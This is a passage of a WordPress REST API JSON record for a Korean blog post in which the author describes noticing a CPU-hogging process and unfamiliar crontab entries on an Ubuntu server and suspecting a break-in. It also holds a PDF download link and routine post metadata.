1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/pre>\n\n\n\n\n\n\n\n<div class=\"wp-block-file\"><a href=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/07\/Downloads.pdf\">Downloads<\/a><a href=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/07\/Downloads.pdf\" class=\"wp-block-file__button\" download>\ub2e4\uc6b4\ub85c\ub4dc<\/a><\/div>\n\n\n","protected":false},"excerpt":{"rendered":"<p>\uc5b8\uc81c \ubd80\ud130\uc778\uac00 ubuntu \uc11c\ubc84\uc5d0 CPU\uac00 100%\uc774\uc0c1 \uc0ac\uc6a9\ud558\ub294 \ud504\ub85c\uc138\uc2a4\uac00 \ubcf4\uc774\uace0 \ud574\ud0b9\uc774 \uc758\uc2ec\ub418\ub294 \ud604\uc0c1\uc774 \ubc1c\uc0dd\ud588\ub2e4. 
&nbsp; crontab\uc5d0 \ub0b4\uac00 \ub4f1\ub85d\ud55c job\uc774 \uc5c6\uc5b4 \uc9c0\uace0 \uc544\ub798\uc758 \ud56d\ubaa9\uc774 \ucd94\uac00\ub41c\uac83\uc744 \ud655\uc778\ud558\uace0 \ucc98\uc74c\uc5d0\ub294 \ubcf4\uc548\ud328\uce58\ub97c \ud574\uc11c \uc790\ub3d9\uc73c\ub85c \ub4f1\ub85d\ub418\ub294 job\uc778\uc904 \uc54c\uace0 \ub300\uc18c\ub86d\uac8c \uc5ec\uae30\uc9c0 \uc54a\uace0 \uadf8\ub0e5 \ub118\uc5b4 \uac14\ub294\ub370&#8230; \uc5b4\ub290&#8230; <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[19,20,18],"_links":{"self":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts\/683"}],"collection":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=683"}],"version-history":[{"count":24,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts\/683\/revisions"}],"predecessor-version":[{"id":732,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts\/683\/revisions\/732"}],"wp:attachment":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=683"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=683"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=683"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}